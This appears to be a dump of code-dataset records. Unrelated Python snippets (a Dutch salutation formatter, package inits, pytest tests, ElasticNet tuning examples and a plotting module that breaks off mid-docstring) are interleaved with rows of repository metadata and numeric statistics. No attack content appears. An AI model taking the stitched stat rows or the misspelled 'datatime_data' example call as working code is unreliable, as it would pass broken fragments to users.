indication_name_use if isinstance(indication_name_use, str) else None
)
gender_designation = (
gender_designation if isinstance(gender_designation, str) else None
)
title = title if isinstance(title, str) else None
partner_title = partner_title if isinstance(partner_title, str) else None
use_own_title = title in [JONKHEER, JONKVROUW] and indication_name_use != PARTNER
title_based_on_partner = (
partner_title in [BARON, PRINS]
and gender_designation == FEMALE
and indication_name_use != EIGEN
)
if use_own_title:
aanschrijfwijze = get_aanschrijfwijze_with_title(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
title,
)
elif title_based_on_partner:
aanschrijfwijze = get_aanschrijfwijze_based_on_partner_title(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
partner_title,
)
else:
aanschrijfwijze = get_default_aanschrijfwijze(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
)
return aanschrijfwijze
| 31.299578 | 120 | 0.678754 | 850 | 7,418 | 5.465882 | 0.057647 | 0.173913 | 0.177787 | 0.199742 | 0.900129 | 0.884201 | 0.871287 | 0.86978 | 0.855144 | 0.855144 | 0 | 0.000179 | 0.246562 | 7,418 | 236 | 121 | 31.432203 | 0.831097 | 0 | 0 | 0.775401 | 0 | 0 | 0.170262 | 0.112294 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026738 | false | 0 | 0.005348 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a8b02f74986f9ffe2d5eb99584a1a8ba1a097888 | 113 | py | Python | mdx_pmwiki_footnotes/__init__.py | JD-P/mdx_pmwiki_footnotes | 82bcd266271ad2fd0e33a06c2e034b487d2ea6d4 | [
"MIT"
] | null | null | null | mdx_pmwiki_footnotes/__init__.py | JD-P/mdx_pmwiki_footnotes | 82bcd266271ad2fd0e33a06c2e034b487d2ea6d4 | [
"MIT"
] | null | null | null | mdx_pmwiki_footnotes/__init__.py | JD-P/mdx_pmwiki_footnotes | 82bcd266271ad2fd0e33a06c2e034b487d2ea6d4 | [
"MIT"
] | null | null | null | from .pmwiki_footnotes import PmWikiFootnotes
def makeExtension(**kwargs):
return PmWikiFootnotes(**kwargs)
| 22.6 | 45 | 0.79646 | 11 | 113 | 8.090909 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115044 | 113 | 4 | 46 | 28.25 | 0.89 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
a8bb9c16f06966f3290f11ad62e15c16986cf9d7 | 105 | py | Python | conf_global.py | sriiora/tcf | e607ce04f97dbb4910d94428c0600a6a7145a825 | [
"Apache-2.0"
] | null | null | null | conf_global.py | sriiora/tcf | e607ce04f97dbb4910d94428c0600a6a7145a825 | [
"Apache-2.0"
] | null | null | null | conf_global.py | sriiora/tcf | e607ce04f97dbb4910d94428c0600a6a7145a825 | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/python3
import tcfl.tc_clear_bbt
tcfl.tc.tc_c.driver_add(tcfl.tc_clear_bbt.tc_clear_bbt_c)
| 17.5 | 57 | 0.809524 | 22 | 105 | 3.454545 | 0.5 | 0.236842 | 0.394737 | 0.368421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010204 | 0.066667 | 105 | 5 | 58 | 21 | 0.765306 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
769d5f51a7daa94302b4935a4885c1a5938ce5bf | 109 | py | Python | agnes/nns/__init__.py | rotinov/CITUS | 3d58794cfd5abf0b4f8b8eeb420af161c58de44e | [
"MIT"
] | 24 | 2019-09-26T09:53:56.000Z | 2021-11-04T02:31:41.000Z | agnes/nns/__init__.py | rotinov/AGNES | 3d58794cfd5abf0b4f8b8eeb420af161c58de44e | [
"MIT"
] | 2 | 2019-09-25T12:03:33.000Z | 2019-09-25T18:30:48.000Z | agnes/nns/__init__.py | rotinov/AGNES | 3d58794cfd5abf0b4f8b8eeb420af161c58de44e | [
"MIT"
] | null | null | null | from agnes.nns import mlp, cnn, rnn
from agnes.nns.initializer import MLP, CNN, RNN, RNNCNN, GRUCNN, LSTMCNN
| 36.333333 | 72 | 0.770642 | 18 | 109 | 4.666667 | 0.611111 | 0.214286 | 0.285714 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137615 | 109 | 2 | 73 | 54.5 | 0.893617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
76aea941fd81780a9f916cdf88986827cfaebfb6 | 659 | py | Python | day17/python/dfriedenberger/src/util_test.py | jamhocken/aoc-2020 | b1f9e04177afaf7e7c15fdc7bf7bc76f27a029f6 | [
"MIT"
] | 16 | 2020-11-21T16:11:07.000Z | 2021-12-06T10:02:25.000Z | day17/python/dfriedenberger/src/util_test.py | jamhocken/aoc-2020 | b1f9e04177afaf7e7c15fdc7bf7bc76f27a029f6 | [
"MIT"
] | 38 | 2020-11-26T05:53:35.000Z | 2021-11-22T17:01:58.000Z | day17/python/dfriedenberger/src/util_test.py | jamhocken/aoc-2020 | b1f9e04177afaf7e7c15fdc7bf7bc76f27a029f6 | [
"MIT"
] | 41 | 2020-11-21T16:11:10.000Z | 2021-12-07T13:36:07.000Z | import pytest
def test_1():
from util import Cube
cube = Cube();
cube.loadFromFile("testinput.txt")
assert 5 == cube.count()
def test_2():
from util import Cube
cube = Cube();
cube.loadFromFile("testinput.txt")
for i in range(0,6):
cube = cube.next()
assert 112 == cube.count()
def test_3():
from util import Cube4D
cube = Cube4D();
cube.loadFromFile("testinput.txt")
assert 5 == cube.count()
def test_4():
from util import Cube4D
cube = Cube4D();
cube.loadFromFile("testinput.txt")
for i in range(0,6):
cube = cube.next()
assert 848 == cube.count() | 17.810811 | 38 | 0.591806 | 88 | 659 | 4.386364 | 0.306818 | 0.165803 | 0.145078 | 0.290155 | 0.860104 | 0.860104 | 0.860104 | 0.860104 | 0.860104 | 0.860104 | 0 | 0.041841 | 0.274659 | 659 | 37 | 39 | 17.810811 | 0.76569 | 0 | 0 | 0.72 | 0 | 0 | 0.078788 | 0 | 0 | 0 | 0 | 0 | 0.16 | 1 | 0.16 | false | 0 | 0.2 | 0 | 0.36 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
76b749d62658c48a478f4aad451f31c6abd82670 | 8,138 | py | Python | examples/regression_original/example_elasticnet_regression.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | examples/regression_original/example_elasticnet_regression.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | examples/regression_original/example_elasticnet_regression.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | # %% ElasticNet, GridSearch, no argument
import parent_import
from muscle_tuning import ElasticNetTuning
import pandas as pd
df_reg = pd.read_csv('../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate' # 目的変数
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # 説明変数
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
tuning.plot_first_validation_curve()
tuning.grid_search_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_validation_curve()
tuning.plot_best_learning_curve()
tuning.plot_param_importances()
# %% ElasticNet, RandomSearch, no argument
import parent_import
from muscle_tuning import ElasticNetTuning
import pandas as pd
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate' # 目的変数
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # 説明変数
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
tuning.random_search_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
# %% ElasticNet, BayesianOptimization, no argument
import parent_import
from muscle_tuning import ElasticNetTuning
import pandas as pd
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate' # 目的変数
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # 説明変数
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
tuning.bayes_opt_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
# %% ElasticNet, Optuna, no argument
import parent_import
from muscle_tuning import ElasticNetTuning
import pandas as pd
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate' # 目的変数
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # 説明変数
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
tuning.optuna_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
# %% ElasticNet, GridSearch, all arguments
import parent_import
from muscle_tuning import ElasticNetTuning
from sklearn.linear_model import ElasticNet
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold
import pandas as pd
import matplotlib.pyplot as plt
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate' # 目的変数
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # 説明変数
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
validation_curve_params = {'alpha': [0, 0.00001, 0.0001, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10, 100],
'l1_ratio': [0, 0.00001, 0.0001, 0.001, 0.01, 0.03, 0.1, 0.3, 0.5, 0.9, 0.97, 0.99, 1]
}
tuning_params = {'alpha': [0.0001, 0.0002, 0.0005, 0.001, 0.002, 0.005, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1],
'l1_ratio': [0, 0.00001, 0.00003, 0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 0.9, 0.97, 1]
}
er = Pipeline([('scaler', StandardScaler()), ('enet', ElasticNet())])
not_opt_params = {}
param_scales = {'alpha': 'log',
'l1_ratio': 'linear'
}
fig, axes = plt.subplots(1, 2, figsize=(8, 3))
tuning.plot_first_validation_curve(estimator=er, validation_curve_params=validation_curve_params,
cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42, scoring='neg_mean_squared_error',
not_opt_params=not_opt_params, param_scales=param_scales,
plot_stats='median', axes=axes
)
tuning.grid_search_tuning(estimator=er, tuning_params=tuning_params,
cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42,
scoring='neg_mean_squared_error',
not_opt_params=not_opt_params, param_scales=param_scales,
mlflow_logging=None, grid_kws={'n_jobs': 3}
)
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_search_history(ax=ax, x_axis='time', plot_kws={'color': 'green'})
plt.show()
tuning.plot_search_map(order=['alpha', 'l1_ratio'],
rounddigits_title=4, rank_number=2, rounddigits_score=4,
subplot_kws={'figsize':(6, 5)}, heat_kws={'cmap': 'YlOrBr'})
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_best_learning_curve(plot_stats='mean', ax=ax)
fig, axes = plt.subplots(1, 2, figsize=(15, 3))
tuning.plot_best_validation_curve(validation_curve_params=validation_curve_params, param_scales=param_scales,
plot_stats='mean', axes=axes)
tuning.plot_param_importances()
# %% ElasticNet, Optuna, all arguments
import parent_import
from muscle_tuning import ElasticNetTuning
from sklearn.linear_model import ElasticNet
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold
import pandas as pd
import matplotlib.pyplot as plt
import optuna
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate' # 目的変数
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # 説明変数
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
tuning_params = {'alpha':(0.0001, 1),
'l1_ratio': (0, 1)
}
er = Pipeline([('scaler', StandardScaler()), ('enet', ElasticNet())])
not_opt_params = {}
param_scales = {'alpha': 'log',
'l1_ratio': 'linear'
}
validation_curve_params = {'alpha': [0, 0.00001, 0.0001, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10, 100],
'l1_ratio': [0, 0.00001, 0.0001, 0.001, 0.01, 0.03, 0.1, 0.3, 0.5, 0.9, 0.97, 0.99, 1]
}
tuning.optuna_tuning(estimator=er, tuning_params=tuning_params,
cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42,
scoring='neg_mean_squared_error', n_trials=40,
study_kws={'sampler': optuna.samplers.TPESampler(seed=42)},
optimize_kws={'show_progress_bar': True},
not_opt_params=not_opt_params, int_params=[], param_scales=param_scales,
mlflow_logging=None
)
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_search_history(ax=ax, x_axis='time', plot_kws={'color': 'green'})
plt.show()
tuning.plot_search_map(order=['alpha', 'l1_ratio'],
rounddigits_title=4, rank_number=2, rounddigits_score=4,
subplot_kws={'figsize':(6, 5)}, scatter_kws={'cmap': 'YlOrBr'})
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_best_learning_curve(plot_stats='mean', ax=ax)
fig, axes = plt.subplots(1, 2, figsize=(15, 3))
tuning.plot_best_validation_curve(validation_curve_params=validation_curve_params, param_scales=param_scales,
plot_stats='mean', axes=axes)
tuning.plot_param_importances()
# %%
| 48.153846 | 130 | 0.699926 | 1,132 | 8,138 | 4.738516 | 0.14311 | 0.059657 | 0.035794 | 0.024609 | 0.938479 | 0.922446 | 0.899515 | 0.88311 | 0.871551 | 0.871365 | 0 | 0.053103 | 0.17621 | 8,138 | 168 | 131 | 48.440476 | 0.747017 | 0.037356 | 0 | 0.775641 | 0 | 0 | 0.125672 | 0.041464 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.224359 | 0 | 0.224359 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4f584cb39649d3f9af1e1b1a47d9319ad4236225 | 67,469 | py | Python | datasense/graphs.py | gillespilon/datasense | 9826ca6df09291c46d004659e25a73a159bbb8a8 | [
"0BSD"
] | 1 | 2019-11-05T02:50:40.000Z | 2019-11-05T02:50:40.000Z | datasense/graphs.py | gillespilon/datasense | 9826ca6df09291c46d004659e25a73a159bbb8a8 | [
"0BSD"
] | null | null | null | datasense/graphs.py | gillespilon/datasense | 9826ca6df09291c46d004659e25a73a159bbb8a8 | [
"0BSD"
] | null | null | null | '''
Graphical analysis
Colours used are colour-blind friendly.
blue '#0077bb'
cyan '#33bbee'
teal '#009988'
orange '#ee7733'
red '#cc3311'
magenta '#ee3377'
grey '#bbbbbb'
'''
from typing import List, Optional, Tuple, Union
import math
from matplotlib.ticker import FormatStrFormatter
from datasense import natural_cubic_spline
from scipy.stats import norm, probplot
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import matplotlib.axes as axes
import pandas as pd
import numpy as np
def plot_scatter_y(
y: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker: Optional[str] = '.',
markersize: Optional[float] = 8,
colour: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y. Optional smoothing applied to y.
The abscissa is a series of integers 1 to the size of y.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
Parameters
----------
y : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker : Optional[str] = '.'
The type of plot point.
markersize : Optional[float] = 8
The size of the plot point (pt).
colour : Optional[str] = '#0077bb'
The colour of the plot point (hexadecimal triplet string).
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> series_y = ds.random_data()
>>> fig, ax = ds.plot_scatter_y(y=series_y)
>>> plt.show()
Example 2
>>> fig, ax = ds.plot_scatter_y(
>>> y=series_y,
>>> figsize=(8, 4.5),
>>> marker='o',
>>> markersize=4,
>>> colour='#ee7733'
>>> )
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
X = pd.Series(range(1, y.size + 1, 1))
if smoothing is None:
ax.plot(
X,
y,
marker=marker,
markersize=markersize,
linestyle='None',
color=colour
)
elif smoothing == 'natural_cubic_spline':
model = natural_cubic_spline(
X=X,
y=y,
number_knots=number_knots
)
ax.plot(
X,
model.predict(X),
marker=marker,
markersize=markersize,
linestyle='None',
color=colour
)
return (fig, ax)
def plot_scatter_x_y(
X: pd.Series,
y: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker: Optional[str] = '.',
markersize: Optional[float] = 8,
colour: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y versus X. Optional smoothing applied to y.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
----------
Parameters
x : pd.Series
The data to plot on the abscissa.
y : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker : Optional[str] = '.'
The type of plot point.
markersize : Optional[float] = 8
The size of the plot point (pt).
colour : Optional[str] = '#0077bb'
The colour of the plot point (hexadecimal triplet string).
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> series_x = ds.datatime_data()
>>> series_y = ds.random_data()
>>> fig, ax = ds.plot_scatter_x_y(
>>> X=series_x,
>>> y=series_y
>>> )
>>> plt.show()
Example 2
>>> series_x = ds.random_data(distribution='randint').sort_values()
>>> fig, ax = ds.plot_scatter_x_y(
>>> X=series_x,
>>> y=series_y,
>>> figsize=(8, 4.5),
>>> marker='o',
>>> markersize=8,
>>> colour='#cc3311'
>>> )
>>> plt.show()
Example 3
>>> series_x = ds.random_data(distribution='uniform').sort_values()
>>> fig, ax = ds.plot_scatter_x_y(
>>> X=series_x,
>>> y=series_y
>>> )
>>> plt.show()
Example 4
>>> series_x = ds.random_data().sort_values()
>>> fig, ax = ds.plot_scatter_x_y(
>>> X=series_x,
>>> y=series_y
>>> )
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y,
marker=marker,
markersize=markersize,
linestyle='None',
color=colour
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model = natural_cubic_spline(
X=XX,
y=y,
number_knots=number_knots
)
ax.plot(
X,
model.predict(XX),
marker=marker,
markersize=markersize,
linestyle='None',
color=colour
)
return (fig, ax)
def plot_line_y(
y: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker: Optional[str] = '.',
markersize: Optional[float] = 8,
linestyle: Optional[str] = '-',
colour: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
'''
Line plot of y. Optional smoothing applied to y.
The abscissa is a series of integers 1 to the size of y.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
Parameters
----------
y : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker : Optional[str] = '.'
The type of plot point.
markersize : Optional[float] = 8
The size of the plot point (pt).
colour : Optional[str] = '#0077bb'
The colour of the plot point (hexadecimal triplet string).
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> series_y = ds.random_data()
>>> fig, ax = ds.plot_line_y(y=series_y)
>>> plt.show()
Example 2
>>> fig, ax = ds.plot_line_y(
>>> y=series_y,
>>> figsize=(8, 4.5),
>>> marker='o',
>>> markersize=4,
>>> colour='#ee7733'
>>> )
>>> )
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
X = pd.Series(range(1, y.size + 1, 1))
if smoothing is None:
ax.plot(
X,
y,
marker=marker,
markersize=markersize,
linestyle=linestyle,
color=colour
)
elif smoothing == 'natural_cubic_spline':
model = natural_cubic_spline(
X=X,
y=y,
number_knots=number_knots
)
ax.plot(
X,
model.predict(X),
marker=marker,
markersize=markersize,
linestyle=linestyle,
color=colour
)
return (fig, ax)
def plot_line_x_y(
X: pd.Series,
y: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker: Optional[str] = '.',
markersize: Optional[float] = 8,
linestyle: Optional[str] = '-',
colour: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y versus X. Optional smoothing applied to y.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
Parameters
----------
x : pd.Series
The data to plot on the abscissa.
y : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker : Optional[str] = '.'
The type of plot point.
markersize : Optional[float] = 8
The size of the plot point (pt).
linestyle : Optional[str] = '-'
The style of the line joining the points.
colour : Optional[str] = '#0077bb'
The colour of the plot point (hexadecimal triplet string).
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
series_x = ds.datetime_data()
series_y = ds.random_data()
fig, ax = ds.plot_line_x_y(
X=series_x,
y=series_y
)
>>> plt.show()
Example 2
>>> series_x = ds.random_data(distribution='randint').sort_values()
>>> fig, ax = ds.plot_line_x_y(
>>> X=series_x,
>>> y=series_y,
>>> figsize=(8, 4.5),
>>> marker='o',
>>> markersize=8,
>>> linestyle=':',
>>> colour='#337733'
>>> )
>>> plt.show()
Example 3
>>> series_x = ds.random_data(distribution='uniform').sort_values()
>>> fig, ax = ds.plot_line_x_y(
>>> X=series_x,
>>> y=series_y
>>> )
>>> plt.show()
Example 4
>>> series_x = ds.random_data().sort_values()
>>> fig, ax = ds.plot_line_x_y(
>>> X=series_x,
>>> y=series_y
>>> )
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y,
marker=marker,
markersize=markersize,
linestyle=linestyle,
color='#0077bb'
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
# TODO: is this necessary?
fig.autofmt_xdate()
else:
XX = X
model = natural_cubic_spline(
X=XX,
y=y,
number_knots=number_knots
)
ax.plot(
X,
model.predict(XX),
marker=marker,
markersize=markersize,
linestyle=linestyle, color='#0077bb')
return (fig, ax)
def plot_scatter_scatter_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker1: Optional[str] = '.',
marker2: Optional[str] = '.',
markersize1: Optional[int] = 8,
markersize2: Optional[int] = 8,
linestyle1: Optional[str] = 'None',
linestyle2: Optional[str] = 'None',
linewidth1: Optional[float] = 1,
linewidth2: Optional[float] = 1,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y1 versus X.
Scatter plot of y2 versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have the same units.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
Parameters
----------
X : pd.Series
The data to plot on the abscissa.
y1 : pd.Series
The data to plot on the ordinate.
y2 : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker1 : Optional[str] = '.'
The type of plot point for y1.
marker2 : Optional[str] = '.'
The type of plot point for y2.
markersize1 : Optional[int] = 8
The size of the plot point for y1.
markersize2 : Optional[int] = 8
The size of the plot point for y2.
linestyle1 : Optional[str] = 'None'
The style of the line for y1.
linestyle2 : Optional[str] = 'None'
The style of the line for y2.
linewidth1 : Optional[float] = 0
The width of the line for y1.
linewidth2 : Optional[float] = 0
The width of the line for y2.
colour1 : Optional[str] = '#0077bb'
The colour of the line for y1.
colour2 : Optional[str] = '#33bbee'
The colour of the line for y2.
labellegendy1 : Optional[str] = None
The legend label of the line y1.
labellegendy2 : Optional[str] = None
The legend label of the line y2.
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> series_x = ds.datetime_data()
>>> series_y1 = ds.random_data()
>>> series_y2 = ds.random_data()
>>> fig, ax = ds.plot_scatter_scatter_x_y1_y2(
